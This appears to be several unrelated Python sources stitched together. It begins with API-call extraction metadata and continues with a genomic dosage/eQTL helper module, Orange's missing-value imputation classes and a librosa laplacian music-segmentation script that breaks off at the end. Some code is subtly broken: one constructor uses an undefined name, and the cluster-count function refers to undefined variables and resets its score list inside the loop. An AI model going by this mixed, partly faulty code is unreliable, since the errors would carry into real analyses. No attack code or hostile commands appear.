6398), True, 'import matplotlib.pyplot as plt\n'), ((6561, 6571), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6569, 6571), True, 'import matplotlib.pyplot as plt\n'), ((1028, 1082), 'numpy.loadtxt', 'np.loadtxt', (['f"""IRK_weights/Butcher_IRK{q}.txt"""'], {'ndmin': '(2)'}), "(f'IRK_weights/Butcher_IRK{q}.txt', ndmin=2)\n", (1038, 1082), True, 'import numpy as np\n'), ((4158, 4212), 'numpy.loadtxt', 'np.loadtxt', (['f"""IRK_weights/Butcher_IRK{q}.txt"""'], {'ndmin': '(2)'}), "(f'IRK_weights/Butcher_IRK{q}.txt', ndmin=2)\n", (4168, 4212), True, 'import numpy as np\n'), ((930, 971), 'numpy.random.randn', 'np.random.randn', (['u0.shape[0]', 'u0.shape[1]'], {}), '(u0.shape[0], u0.shape[1])\n', (945, 971), True, 'import numpy as np\n'), ((2043, 2058), 'numpy.ones', 'np.ones', (['(2, 1)'], {}), '((2, 1))\n', (2050, 2058), True, 'import numpy as np\n'), ((2108, 2123), 'numpy.ones', 'np.ones', (['(2, 1)'], {}), '((2, 1))\n', (2115, 2123), True, 'import numpy as np\n'), ((3857, 3898), 'numpy.random.randn', 'np.random.randn', (['u0.shape[0]', 'u0.shape[1]'], {}), '(u0.shape[0], u0.shape[1])\n', (3872, 3898), True, 'import numpy as np\n'), ((4090, 4131), 'numpy.random.randn', 'np.random.randn', (['u1.shape[0]', 'u1.shape[1]'], {}), '(u1.shape[0], u1.shape[1])\n', (4105, 4131), True, 'import numpy as np\n'), ((5201, 5216), 'numpy.ones', 'np.ones', (['(2, 1)'], {}), '((2, 1))\n', (5208, 5216), True, 'import numpy as np\n'), ((5268, 5283), 'numpy.ones', 'np.ones', (['(2, 1)'], {}), '((2, 1))\n', (5275, 5283), True, 'import numpy as np\n'), ((919, 929), 'numpy.std', 'np.std', (['u0'], {}), '(u0)\n', (925, 929), True, 'import numpy as np\n'), ((3651, 3661), 'numpy.log', 'np.log', (['dt'], {}), '(dt)\n', (3657, 3661), True, 'import numpy as np\n'), ((3846, 3856), 'numpy.std', 'np.std', (['u0'], {}), '(u0)\n', (3852, 3856), True, 'import numpy as np\n'), ((4079, 4089), 'numpy.std', 'np.std', (['u1'], {}), '(u1)\n', (4085, 4089), True, 'import numpy as np\n'), ((3630, 3645), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (3638, 3645), True, 'import numpy as np\n')]
|
""" Functions for working with tabix dosages in pandas dataframes
"""
import gzip
import numpy as np
import pandas as pd
import pysam
import statsmodels.api as sm
class Dosage(object):
def __init__(self, dosages, annotations, gene_name):
# Match up the annotation dataframe with the dosage dataframe
mindex = np.intersect1d(np.asarray(dosages.index, dtype=str),
np.asarray(annotations.index, dtype=str))
self.annot = annotations.loc[mindex, :]
ordering = self.annot.ix[:, 'pos'].argsort()
self.annot = self.annot.iloc[ordering, :]
self.dosages = dosages.ix[mindex, :]
self.dosages = self.dosages.iloc[ordering, :]
self.gene_name = gene_name
def run_eQTL(self, count_matrix, covariates, extra_snps=None):
#self.pvalues = self.dosages.apply()
pvalues = self.dosages.apply(eQTL_func, axis=1, args=(covariates,
count_matrix.ix[self.gene_name, :]))
self.pvalues = pvalues
def get_dosages_by_range(chrm, start, end, gene_name, annotation_file,
dosage_df, mapping=None):
"""
Fuzzy mapping between annotation and genotypes
Returns Dosage instance.
"""
ann_file = pysam.Tabixfile(annotation_file)
ann_v = ann_file.fetch(chrm, start, end)
rsIDs = []
pos = []
ref = []
alt = []
for i in ann_v:
i = i.split("\t")
rsIDs.append(i[3])
pos.append(int(i[1]))
ref.append(i[6])
alt.append(i[7])
annot = pd.DataFrame({'pos': pos, 'ref': ref, 'alt': alt}, index=pd.Index(rsIDs))
comb_iter = []
for dos in dosage_df:
mindex = np.intersect1d(np.asarray(dos.index, dtype=str),
np.asarray(annot.index, dtype=str))
if len(mindex) > 0:
comb_iter.append(dos.ix[mindex, :])
else:
pass
out_dos = pd.concat(comb_iter)
'''
dosages = pd.read_csv(dosage_path + path, sep=" ", header=None,
index_col = 0, skiprows=roughly_first,
nrows=roughly_end-roughly_first, names=col_names.columns)
'''
print(annot.shape, out_dos.shape, gene_name)
return Dosage(out_dos, annot, gene_name)
def generate_dosage_mapping(dosage_file, mapping_file = None, interval=50):
"""
Returns dictionary of rsIDs: fileposition from a dosage file
"""
if not mapping_file:
with open(dosage_file) as fh:
fh.next()
t = 0
debug = 0
f_i = {}
for i, j in enumerate(fh):
if i % 50 == 0:
f_i[j.split(" ")[0]] = i - 1
else: pass
return(f_i)
def eQTL_func(snps, cov, expression):
"""
"""
cov = cov.T
cov['snps'] = snps
cov = sm.add_constant(cov)
model = sm.OLS(expression, cov)
return(model.fit().pvalues['snps'])
class eQTL(object):
""" Python class for completing eQTLs. Does lazy loading of all large
files.
"""
def __init__(self, dosages_path, expression, vannotation):
self.dosage = dosages_path
self.expression = expression
self.vannotations = vannotations
def generate_mapping():
pass
"""
if mapping:
for i in ann_v:
rsID = i.split("\t")[3]
try:
roughly_first = mapping[rsID]
rsIDs.append(rsID)
pos.append(int(i.split("\t")[1]))
break
except KeyError:
pass
for i in ann_v:
i = i.split("\t")
try:
roughly_end = mapping[i[3]]
except KeyError:
pass
pos.append(int(i[1]))
rsIDs.append(i[3])
"""
def get_annotation(annotation, chrm):
ann_file = pysam.Tabixfile(annotation)
ann_v = ann_file.fetch(chrm)
rsIDs = []
pos = []
ref = []
alt = []
for i in ann_v:
i = i.split("\t")
rsIDs.append(i[3])
pos.append(int(i[1]))
ref.append(i[6])
alt.append(i[7])
annot = pd.DataFrame({'pos': pos, 'ref': ref, 'alt': alt}, index=pd.Index(rsIDs))
return(annot)
|
[
"numpy.asarray",
"pysam.Tabixfile",
"pandas.Index",
"statsmodels.api.add_constant",
"statsmodels.api.OLS",
"pandas.concat"
] |
[((1215, 1247), 'pysam.Tabixfile', 'pysam.Tabixfile', (['annotation_file'], {}), '(annotation_file)\n', (1230, 1247), False, 'import pysam\n'), ((1870, 1890), 'pandas.concat', 'pd.concat', (['comb_iter'], {}), '(comb_iter)\n', (1879, 1890), True, 'import pandas as pd\n'), ((2765, 2785), 'statsmodels.api.add_constant', 'sm.add_constant', (['cov'], {}), '(cov)\n', (2780, 2785), True, 'import statsmodels.api as sm\n'), ((2798, 2821), 'statsmodels.api.OLS', 'sm.OLS', (['expression', 'cov'], {}), '(expression, cov)\n', (2804, 2821), True, 'import statsmodels.api as sm\n'), ((3788, 3815), 'pysam.Tabixfile', 'pysam.Tabixfile', (['annotation'], {}), '(annotation)\n', (3803, 3815), False, 'import pysam\n'), ((346, 382), 'numpy.asarray', 'np.asarray', (['dosages.index'], {'dtype': 'str'}), '(dosages.index, dtype=str)\n', (356, 382), True, 'import numpy as np\n'), ((401, 441), 'numpy.asarray', 'np.asarray', (['annotations.index'], {'dtype': 'str'}), '(annotations.index, dtype=str)\n', (411, 441), True, 'import numpy as np\n'), ((1569, 1584), 'pandas.Index', 'pd.Index', (['rsIDs'], {}), '(rsIDs)\n', (1577, 1584), True, 'import pandas as pd\n'), ((1663, 1695), 'numpy.asarray', 'np.asarray', (['dos.index'], {'dtype': 'str'}), '(dos.index, dtype=str)\n', (1673, 1695), True, 'import numpy as np\n'), ((1713, 1747), 'numpy.asarray', 'np.asarray', (['annot.index'], {'dtype': 'str'}), '(annot.index, dtype=str)\n', (1723, 1747), True, 'import numpy as np\n'), ((4125, 4140), 'pandas.Index', 'pd.Index', (['rsIDs'], {}), '(rsIDs)\n', (4133, 4140), True, 'import pandas as pd\n')]
|
import numpy as np
import scipy.sparse as sp
import Orange.data
from Orange.statistics import distribution, basic_stats
from Orange.util import Reprable
from .transformation import Transformation, Lookup
__all__ = [
"ReplaceUnknowns",
"Average",
"DoNotImpute",
"DropInstances",
"Model",
"AsValue",
"Random",
"Default",
]
class ReplaceUnknowns(Transformation):
"""
A column transformation which replaces unknown values with a fixed `value`.
Parameters
----------
variable : Orange.data.Variable
The target variable for imputation.
value : int or float
The value with which to replace the unknown values
"""
def __init__(self, variable, value=0):
super().__init__(variable)
self.value = value
def transform(self, c):
if sp.issparse(c):
c.data = np.where(np.isnan(c.data), self.value, c.data)
return c
else:
return np.where(np.isnan(c), self.value, c)
class BaseImputeMethod(Reprable):
name = ""
short_name = ""
description = ""
format = "{var.name} -> {self.short_name}"
columns_only = False
def __call__(self, data, variable):
""" Imputes table along variable column.
Args:
data (Table): A table to impute.
variable (Variable): Variable for completing missing values.
Returns:
A new Variable instance with completed missing values or
a array mask of rows to drop out.
"""
raise NotImplementedError
def format_variable(self, var):
return self.format.format(var=var, self=self)
def __str__(self):
return self.name
def copy(self):
return self
@classmethod
def supports_variable(cls, variable):
return True
class DoNotImpute(BaseImputeMethod):
name = "Don't impute"
short_name = "leave"
description = ""
def __call__(self, data, variable):
return variable
class DropInstances(BaseImputeMethod):
name = "Remove instances with unknown values"
short_name = "drop"
description = ""
def __call__(self, data, variable):
col, _ = data.get_column_view(variable)
return np.isnan(col)
class Average(BaseImputeMethod):
name = "Average/Most frequent"
short_name = "average"
description = "Replace with average/mode of the column"
def __call__(self, data, variable, value=None):
variable = data.domain[variable]
if value is None:
if variable.is_continuous:
stats = basic_stats.BasicStats(data, variable)
value = stats.mean
elif variable.is_discrete:
dist = distribution.get_distribution(data, variable)
value = dist.modus()
else:
raise TypeError("Variable must be continuous or discrete")
a = variable.copy(compute_value=ReplaceUnknowns(variable, value))
a.to_sql = ImputeSql(variable, value)
return a
class ImputeSql(Reprable):
def __init__(self, var, default):
self.var = var
self.default = default
def __call__(self):
return "coalesce(%s, %s)" % (self.var.to_sql(), str(self.default))
class Default(BaseImputeMethod):
name = "Value"
short_name = "value"
description = ""
columns_only = True
format = "{var} -> {self.default}"
def __init__(self, default=0):
self.default = default
def __call__(self, data, variable, *, default=None):
variable = data.domain[variable]
default = default if default is not None else self.default
return variable.copy(compute_value=ReplaceUnknowns(variable, default))
def copy(self):
return Default(self.default)
class ReplaceUnknownsModel(Reprable):
"""
Replace unknown values with predicted values using a `Orange.base.Model`
Parameters
----------
variable : Orange.data.Variable
The target variable for the imputation.
model : Orange.base.Model
A fitted model predicting `variable`.
"""
def __init__(self, variable, model):
assert model.domain.class_var == variable
self.variable = variable
self.model = model
def __call__(self, data):
if isinstance(data, Orange.data.Instance):
column = np.array([float(data[self.variable])])
else:
column = np.array(data.get_column_view(self.variable)[0], copy=True)
mask = np.isnan(column)
if not np.any(mask):
return column
if isinstance(data, Orange.data.Instance):
predicted = self.model(data)
else:
predicted = self.model(data[mask])
column[mask] = predicted
return column
class Model(BaseImputeMethod):
_name = "Model-based imputer"
short_name = "model"
description = ""
format = BaseImputeMethod.format + " ({self.learner.name})"
@property
def name(self):
return "{} ({})".format(self._name, getattr(self.learner, "name", ""))
def __init__(self, learner):
self.learner = learner
def __call__(self, data, variable):
variable = data.domain[variable]
domain = domain_with_class_var(data.domain, variable)
if self.learner.check_learner_adequacy(domain):
data = data.transform(domain)
model = self.learner(data)
assert model.domain.class_var == variable
return variable.copy(compute_value=ReplaceUnknownsModel(variable, model))
else:
raise ValueError(
"`{}` doesn't support domain type".format(self.learner.name)
)
def copy(self):
return Model(self.learner)
def supports_variable(self, variable):
domain = Orange.data.Domain([], class_vars=variable)
return self.learner.check_learner_adequacy(domain)
def domain_with_class_var(domain, class_var):
"""
Return a domain with class_var as output domain.class_var.
If class_var is in the input domain's attributes it is removed from the
output's domain.attributes.
"""
if domain.class_var is class_var:
return domain
elif class_var in domain.attributes:
attrs = [var for var in domain.attributes if var is not class_var]
else:
attrs = domain.attributes
return Orange.data.Domain(attrs, class_var)
class IsDefined(Transformation):
def transform(self, c):
if sp.issparse(c):
c = c.toarray()
return ~np.isnan(c)
class AsValue(BaseImputeMethod):
name = "As a distinct value"
short_name = "new value"
description = ""
def __call__(self, data, variable):
variable = data.domain[variable]
if variable.is_discrete:
fmt = "{var.name}"
value = "N/A"
var = Orange.data.DiscreteVariable(
fmt.format(var=variable),
values=variable.values + [value],
base_value=variable.base_value,
compute_value=Lookup(
variable,
np.arange(len(variable.values), dtype=int),
unknown=len(variable.values),
),
sparse=variable.sparse,
)
return var
elif variable.is_continuous:
fmt = "{var.name}_def"
indicator_var = Orange.data.DiscreteVariable(
fmt.format(var=variable),
values=("undef", "def"),
compute_value=IsDefined(variable),
sparse=variable.sparse,
)
stats = basic_stats.BasicStats(data, variable)
return (
variable.copy(compute_value=ReplaceUnknowns(variable, stats.mean)),
indicator_var,
)
else:
raise TypeError(type(variable))
class ReplaceUnknownsRandom(Transformation):
"""
A column transformation replacing unknowns with values drawn randomly from
an empirical distribution.
Parameters
----------
variable : Orange.data.Variable
The target variable for imputation.
distribution : Orange.statistics.distribution.Distribution
The corresponding sampling distribution
"""
def __init__(self, variable, distribution):
assert distribution.size > 0
assert distribution.variable == variable
super().__init__(variable)
self.distribution = distribution
if variable.is_discrete:
counts = np.array(distribution)
elif variable.is_continuous:
counts = np.array(distribution)[1, :]
else:
raise TypeError("Only discrete and continuous " "variables are supported")
csum = np.sum(counts)
if csum > 0:
self.sample_prob = counts / csum
else:
self.sample_prob = np.ones_like(counts) / len(counts)
def transform(self, c):
if not sp.issparse(c):
c = np.array(c, copy=True)
else:
c = c.toarray().ravel()
nanindices = np.flatnonzero(np.isnan(c))
if self.variable.is_discrete:
sample = np.random.choice(
len(self.variable.values),
size=len(nanindices),
replace=True,
p=self.sample_prob,
)
else:
sample = np.random.choice(
np.asarray(self.distribution)[0, :],
size=len(nanindices),
replace=True,
p=self.sample_prob,
)
c[nanindices] = sample
return c
class Random(BaseImputeMethod):
name = "Random values"
short_name = "random"
description = "Replace with a random value"
def __call__(self, data, variable):
variable = data.domain[variable]
dist = distribution.get_distribution(data, variable)
# A distribution is invalid if a continuous variable's column does not
# contain any known values or if a discrete variable's .values == []
isinvalid = dist.size == 0
if isinvalid and variable.is_discrete:
assert len(variable.values) == 0
raise ValueError("'{}' has no values".format(variable))
elif isinvalid and variable.is_continuous:
raise ValueError("'{}' has an unknown distribution".format(variable))
if variable.is_discrete and np.sum(dist) == 0:
dist += 1 / len(dist)
elif variable.is_continuous and np.sum(dist[1, :]) == 0:
dist[1, :] += 1 / dist.shape[1]
return variable.copy(compute_value=ReplaceUnknownsRandom(variable, dist))
|
[
"Orange.statistics.distribution.get_distribution",
"numpy.ones_like",
"Orange.statistics.basic_stats.BasicStats",
"numpy.asarray",
"numpy.any",
"scipy.sparse.issparse",
"numpy.sum",
"numpy.array",
"numpy.isnan"
] |
[((833, 847), 'scipy.sparse.issparse', 'sp.issparse', (['c'], {}), '(c)\n', (844, 847), True, 'import scipy.sparse as sp\n'), ((2250, 2263), 'numpy.isnan', 'np.isnan', (['col'], {}), '(col)\n', (2258, 2263), True, 'import numpy as np\n'), ((4537, 4553), 'numpy.isnan', 'np.isnan', (['column'], {}), '(column)\n', (4545, 4553), True, 'import numpy as np\n'), ((6529, 6543), 'scipy.sparse.issparse', 'sp.issparse', (['c'], {}), '(c)\n', (6540, 6543), True, 'import scipy.sparse as sp\n'), ((8830, 8844), 'numpy.sum', 'np.sum', (['counts'], {}), '(counts)\n', (8836, 8844), True, 'import numpy as np\n'), ((9933, 9978), 'Orange.statistics.distribution.get_distribution', 'distribution.get_distribution', (['data', 'variable'], {}), '(data, variable)\n', (9962, 9978), False, 'from Orange.statistics import distribution, basic_stats\n'), ((4569, 4581), 'numpy.any', 'np.any', (['mask'], {}), '(mask)\n', (4575, 4581), True, 'import numpy as np\n'), ((6589, 6600), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (6597, 6600), True, 'import numpy as np\n'), ((8604, 8626), 'numpy.array', 'np.array', (['distribution'], {}), '(distribution)\n', (8612, 8626), True, 'import numpy as np\n'), ((9035, 9049), 'scipy.sparse.issparse', 'sp.issparse', (['c'], {}), '(c)\n', (9046, 9049), True, 'import scipy.sparse as sp\n'), ((9067, 9089), 'numpy.array', 'np.array', (['c'], {'copy': '(True)'}), '(c, copy=True)\n', (9075, 9089), True, 'import numpy as np\n'), ((9176, 9187), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (9184, 9187), True, 'import numpy as np\n'), ((879, 895), 'numpy.isnan', 'np.isnan', (['c.data'], {}), '(c.data)\n', (887, 895), True, 'import numpy as np\n'), ((980, 991), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (988, 991), True, 'import numpy as np\n'), ((2604, 2642), 'Orange.statistics.basic_stats.BasicStats', 'basic_stats.BasicStats', (['data', 'variable'], {}), '(data, variable)\n', (2626, 2642), False, 'from Orange.statistics import distribution, basic_stats\n'), ((7696, 7734), 'Orange.statistics.basic_stats.BasicStats', 'basic_stats.BasicStats', (['data', 'variable'], {}), '(data, variable)\n', (7718, 7734), False, 'from Orange.statistics import distribution, basic_stats\n'), ((8956, 8976), 'numpy.ones_like', 'np.ones_like', (['counts'], {}), '(counts)\n', (8968, 8976), True, 'import numpy as np\n'), ((10500, 10512), 'numpy.sum', 'np.sum', (['dist'], {}), '(dist)\n', (10506, 10512), True, 'import numpy as np\n'), ((2740, 2785), 'Orange.statistics.distribution.get_distribution', 'distribution.get_distribution', (['data', 'variable'], {}), '(data, variable)\n', (2769, 2785), False, 'from Orange.statistics import distribution, basic_stats\n'), ((8685, 8707), 'numpy.array', 'np.array', (['distribution'], {}), '(distribution)\n', (8693, 8707), True, 'import numpy as np\n'), ((9497, 9526), 'numpy.asarray', 'np.asarray', (['self.distribution'], {}), '(self.distribution)\n', (9507, 9526), True, 'import numpy as np\n'), ((10593, 10611), 'numpy.sum', 'np.sum', (['dist[1, :]'], {}), '(dist[1, :])\n', (10599, 10611), True, 'import numpy as np\n')]
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
======================
Laplacian segmentation
======================
This notebook implements the laplacian segmentation method of
`McFee and Ellis, 2014 <http://bmcfee.github.io/papers/ismir2014_spectral.pdf>`_,
with a couple of minor stability improvements.
This implementation is available at https://librosa.github.io/librosa/auto_examples/plot_segmentation.html
Additional functions have been added to the core segmentation:
- unsupervised determination of the number of clusters suitable for the running task
- different feature packages: spectral, cepstral and chroma.
- a cosine distance between the different clusters that is plot together with cluster segmentation
- a set of parameters reported in params.py file necessary for tuning the segmentation model.
usage:
python3 spectral_clustering_audio.py audiofilename.wav [.mp3]
Input:
- name of audio file to be analyzed
Output:
- Segmentation and grouping of the different musical sections synchronized on user-chosen onsets
- Optional plots of similarity and recurrence matrix
- Optional timestamps text file with parameters and time boundaries
"""
# Code source by <NAME> (2018) adapted from <NAME> (2014)
# License: ISC
###################################
# Imports
# - numpy for basic functionality
# - scipy for graph Laplacian
# - matplotlib for visualization
# - sklearn.cluster for K-Means, for metrics and scaling.
# - warnings to delete warning message for scipy package
from __future__ import division
import numpy as np
import scipy
import warnings
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
import sys, os
import argparse
import matplotlib.pyplot as plt
from matplotlib import gridspec
import sklearn.cluster
from sklearn.preprocessing import scale
import sklearn.metrics
import sklearn.utils
import librosa
import librosa.display
import cluster_rotate
import params
plt.rcParams.update({'font.size': 8})
BINS_PER_OCTAVE = params.BINS_PER_OCTAVE
N_OCTAVES = params.N_OCTAVES
NFFT = int(params.NFFT)
STEP = int(params.STEP)
#######################################
def detect_onsets(y, sr, M):
#detect onsets
oenv = librosa.onset.onset_strength(S=M, sr=sr)
# Detect events without backtracking
onset_raw = librosa.onset.onset_detect(onset_envelope=oenv, backtrack=False)
## Backtrack the events using the onset envelope
onset_bt = librosa.onset.onset_backtrack(onset_raw, oenv)
# we fix_frames to include non-beat frames 0 and C.shape[1] (final frame)
onset_frames = librosa.util.fix_frames(onset_raw, x_min=0, x_max=M.shape[1]-1)
onset_times = librosa.frames_to_time(onset_frames, sr=sr, hop_length = STEP)
# To reduce dimensionality, we'll beat-synchronous the CQT
Msync = librosa.util.sync(M, onset_raw, aggregate=np.median)
if params.onset_plot:
plt.figure(figsize=(12, 4))
plt.plot(oenv, label='Onset strength')
plt.vlines(onset_raw, 0, oenv.max(), label='Raw onsets')
plt.vlines(onset_bt, 0, oenv.max(), label='Backtracked', color='r')
plt.legend(frameon=True, framealpha=0.75)
plt.tight_layout()
plt.figure(figsize=(12, 4))
plt.subplot(2,1,1)
plt.title('CQT spectrogram')
librosa.display.specshow(M, y_axis='cqt_hz', sr=sr, hop_length= STEP, bins_per_octave=BINS_PER_OCTAVE, x_axis='time')
plt.tight_layout()
plt.subplot(2,1,2)
plt.title('CQT spectrogram synchronized on onsets')
librosa.display.specshow(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis='cqt_hz', x_axis='time', x_coords=onset_times)
plt.tight_layout()
return onset_raw, onset_times, Msync
##############################################
def detect_beats(y, sr, M):
tempo, beats = librosa.beat.beat_track(y=y, sr=sr, hop_length = STEP, trim=False)
print('Detected tempo: {0:.2f} bpm'.format(tempo))
beat_period = np.diff(librosa.frames_to_time(beats, sr=sr, hop_length= STEP))
print('mean beat period: {0:.2f} ; std beat period: {1:.2f}'.format(60/np.mean(beat_period), np.std(beat_period)))
beats_frames = librosa.util.fix_frames(beats, x_min=0, x_max=M.shape[1]-1)
beat_times = librosa.frames_to_time(beats_frames, sr=sr, hop_length = STEP)
Msync = librosa.util.sync(M, beats_frames, aggregate=np.median)
if params.onset_plot:
plt.figure(figsize=(12, 4))
plt.subplot(2,1,1)
plt.title('CQT spectrogram')
librosa.display.specshow(M, y_axis='cqt_hz', sr=sr, hop_length=STEP, bins_per_octave=BINS_PER_OCTAVE, x_axis='time')
plt.tight_layout()
# For plotting purposes, we'll need the timing of the beats
# we fix_frames to include non-beat frames 0 and C.shape[1] (final frame)
plt.subplot(2,1,2)
plt.title('CQT spectrogram synchronized on beats')
librosa.display.specshow(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis='cqt_hz', x_axis='time', x_coords=beat_times)
plt.tight_layout()
return beats_frames, beat_times, Msync
##############################################
def no_onsets(sr, M):
onsets = np.arange(0, M.shape[1])
onset_times = librosa.samples_to_time(onsets, sr=sr/STEP)
if params.onset_plot:
plt.figure(figsize=(12, 4))
plt.title('CQT spectrogram')
librosa.display.specshow(M, y_axis='cqt_hz', sr=sr, bins_per_octave=BINS_PER_OCTAVE, x_axis='time', x_coords=onset_times)
plt.tight_layout()
return onsets, onset_times, M
def get_manual_beats(sr, M, filename):
with open(filename, 'r') as f:
data = f.readlines()
times = np.array([float(x.strip()) for x in data[1:]])
frames = np.array([int(x * sr / STEP) for x in times])
onsets = librosa.util.fix_frames(frames, x_min=0, x_max=M.shape[1]-1)
onset_times = librosa.frames_to_time(onsets, sr=sr, hop_length = STEP)
Msync = librosa.util.sync(M, onsets, aggregate=np.median)
if params.onset_plot:
plt.figure(figsize=(12, 4))
plt.subplot(2,1,1)
plt.title('CQT spectrogram')
librosa.display.specshow(M, y_axis='cqt_hz', sr=sr, hop_length=STEP, bins_per_octave=BINS_PER_OCTAVE, x_axis='time')
plt.tight_layout()
plt.subplot(2,1,2)
plt.title('CQT spectrogram synchronized on beats')
librosa.display.specshow(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis='cqt_hz', x_axis='time', x_coords=onset_times)
plt.tight_layout()
return onsets, onset_times, Msync
def extract_onsets(y, sr, manual_opt):
method = params.onset
#compute the CQT transform C: np.array((252, Tmax*sr/STEP))
C = librosa.amplitude_to_db(librosa.core.magphase(librosa.cqt(y=y, sr=sr, bins_per_octave=BINS_PER_OCTAVE, n_bins=N_OCTAVES * BINS_PER_OCTAVE, hop_length = STEP))[0], ref=np.max)
#to reduce dimensionality, we'll onset-synchronous the CQT
#onset is a vector of onset indexes np.array((N+1,)) including 0
#onset_times is a vector of onset times np.array((N+1,)) including 0
#Csync is the CQT transform synchronized on onsets np.array((252, N))
if method == 'no':
onset, onset_times, Csync = no_onsets(sr, C)
elif method == 'onset':
onset, onset_times, Csync = detect_onsets(y, sr, C)
elif method == 'beat':
onset, onset_times, Csync = detect_beats(y, sr, C)
elif method == 'manual':
onset, onset_times, Csync = get_manual_beats(sr, C, manual_opt)
else:
print('onset parameter is not well-defined')
sys.exit()
return onset, onset_times, Csync
def build_weighted_rec_matrix(M):
# Let's build a weighted recurrence affinity matrix using onset-synchronous CQT
# the similarity matrix is filtered to prevent linkage errors and fill the gaps
# the filter corresponds to a width=3 time window and a majority vote.
R = librosa.segment.recurrence_matrix(M, width=3, mode='affinity',sym=True)
# Enhance diagonals with a median filter
df = librosa.segment.timelag_filter(scipy.ndimage.median_filter)
Rf = df(R, size=(1, 7))
return Rf
def build_seq_matrix(M, x):
#build the sequence matrix using feature-similarity
#Rpath[i, i+/-1] = \exp(- |M[i] - C[i+/-1]|^2 / sigma^2)`
#synchronize features with onsets
Msync = librosa.util.sync(M, x, aggregate=np.median)
#Msync = M #pas de syncrhonisation
#normalize (rescale) features between 0 and 1
Msync_normed = scale(Msync)
#constant scaling
path_distance = np.sum(np.diff(Msync_normed, axis=1)**2, axis=0)
#sigma is the median distance between successive beats/onsets.
sigma = np.median(path_distance)
path_sim = np.exp(-path_distance / sigma)
#local scaling from A Spectral Clustering Approach to Speaker Diarization, <NAME>, <NAME>, <NAME>, <NAME>
R_path = np.diag(path_sim, k=1) + np.diag(path_sim, k=-1)
return R_path
def build_laplacian_and_evec(Rf, R_path, opt, onsets):
# And compute the balanced combination A of the two similarity matrices Rf and R_path
deg_path = np.sum(R_path, axis=1)
deg_rec = np.sum(Rf, axis=1)
mu = deg_path.dot(deg_path + deg_rec) / np.sum((deg_path + deg_rec)**2)
print('Optimal weight value (mu): {0:.2f}'.format(mu))
A = mu * Rf + (1 - mu) * R_path
# Plot the resulting graphs
if opt: plot_similarity(Rf, R_path, A, onsets)
# L: symetrized normalized Laplacian
L = scipy.sparse.csgraph.laplacian(A, normed=True)
# and its spectral decomposition (Find eigenvalues w and optionally eigenvectors v of matrix L)
evals, evecs = np.linalg.eigh(L)
print('L shape:', L.shape)
# We can clean this up further with a median filter.
# This can help smooth over small discontinuities
evecs = scipy.ndimage.median_filter(evecs, size=(9, 1))
# cumulative normalization is needed for symmetric normalize laplacian eigenvectors
Cnorm = np.cumsum(evecs**2, axis=1)**0.5
return Cnorm, evals, evecs
################################################
def compute_nb_clusters(method, evals, evecs, Tmax):
if method == 'fixed':
c = params.cluster_nb # list
elif method == 'max':
nc = []
for it in range(params.cluster_max):
nc.append(cluster_rotate.cluster_rotate(evecs/Cnorm, evals, range(1,10), 1, False))
c = [int(np.mean(nc))+1]
elif method == 'evals':
ind = np.where(1- evals > 0.75)[0]
#print(ind)
return [len(ind)+1 ]
elif method in ['silhouette', 'davies_bouldin', 'calinski_harabaz']:
list_k = range(2,50,2)
Cnorm = np.cumsum(e**2, axis=1)**0.5 #eigenvectors in input
for k in list_k:
print('nb of clusters:', k)
X = e[:, :k] / Cnorm[:, k-1:k]
# Let's use these k components to cluster beats into segments
# (Algorithm 1)
KM = sklearn.cluster.KMeans(n_clusters=k)
seg_ids = KM.fit_predict(X)
score = []
if method == 'silhouette':
score.append(sklearn.metrics.silhouette_score(X, seg_ids, metric='euclidean')) #max (proche de 1)
elif method == 'davies_bouldin':
score.append(davies_bouldin_score(X, seg_ids)) #min
elif method == 'calinski_harabaz':
score.append(sklearn.metrics.calinski_harabaz_score(X, seg_ids)) #max
if method == 'silhouette':
return list_k[np.argmax(score)]
elif method == 'davies_bouldin':
return list_k[np.argmin(score)]
elif method == 'calinski_harabaz':
return list_k[np.argmax(score)]
else:
print('method for finding the right number of clusters is unknown')
sys.exit()
print('nb of clusters:', c)
return c
def davies_bouldin_score(X, labels):
"""Computes the Davies-Bouldin score.
The score is defined as the ratio of within-cluster distances to
between-cluster distances.
Read more in the :ref:`User Guide <davies-bouldin_index>`.
Parameters
----------
X : array-like, shape (``n_samples``, ``n_features``)
List of ``n_features``-dimensional data points. Each row corresponds
to a single data point.
labels : array-like, shape (``n_samples``,)
Predicted labels for each sample.
Returns
-------
score: float
The resulting Davies-Bouldin score.
References
----------
.. [1] `Davies, <NAME>.; Bouldin, <NAME>. (1979).
"A Cluster Separation Measure". IEEE Transactions on
Pattern Analysis and Machine Intelligence. PAMI-1 (2): 224-227`_
"""
X, labels = sklearn.utils.check_X_y(X, labels)
le = sklearn.preprocessing.LabelEncoder()
labels = le.fit_transform(labels)
n_samples, _ = X.shape
n_labels = len(le.classes_)
if not 1 < n_labels < n_samples:
raise ValueError("Number of labels is %d. Valid values are 2 to n_samples - 1 (inclusive)" % n_labels)
intra_dists = np.zeros(n_labels)
centroids = np.zeros((n_labels, len(X[0])), dtype=np.float)
for k in range(n_labels):
cluster_k = sklearn.utils.safe_indexing(X, labels == k)
centroid = cluster_k.mean(axis=0)
centroids[k] = centroid
intra_dists[k] = np.average(sklearn.metrics.pairwise.pairwise_distances(cluster_k, [centroid]))
centroid_distances = sklearn.metrics.pairwise.pairwise_distances(centroids)
if np.allclose(intra_dists, 0) or np.allclose(centroid_distances, 0):
return 0.0
score = (intra_dists[:, None] + intra_dists) / centroid_distances
score[score == np.inf] = np.nan
return np.mean(np.nanmax(score, axis=1))
def plot_similarity(Rf, R_path, A, onset_times):
plt.figure(figsize=(12, 4))
plt.subplot(1, 3, 1)
librosa.display.specshow(Rf, cmap='inferno_r', y_axis='time', y_coords=onset_times)
plt.title('Long-range recurrence similarity (Rrec)')
plt.subplot(1, 3, 2)
librosa.display.specshow(R_path, cmap='inferno_r')
plt.title('Local path similarity (Rloc)')
plt.subplot(1, 3, 3)
librosa.display.specshow(A, cmap='inferno_r')
plt.title('Combined graph (A = m Rrec + (1-m) Rloc)')
plt.tight_layout()
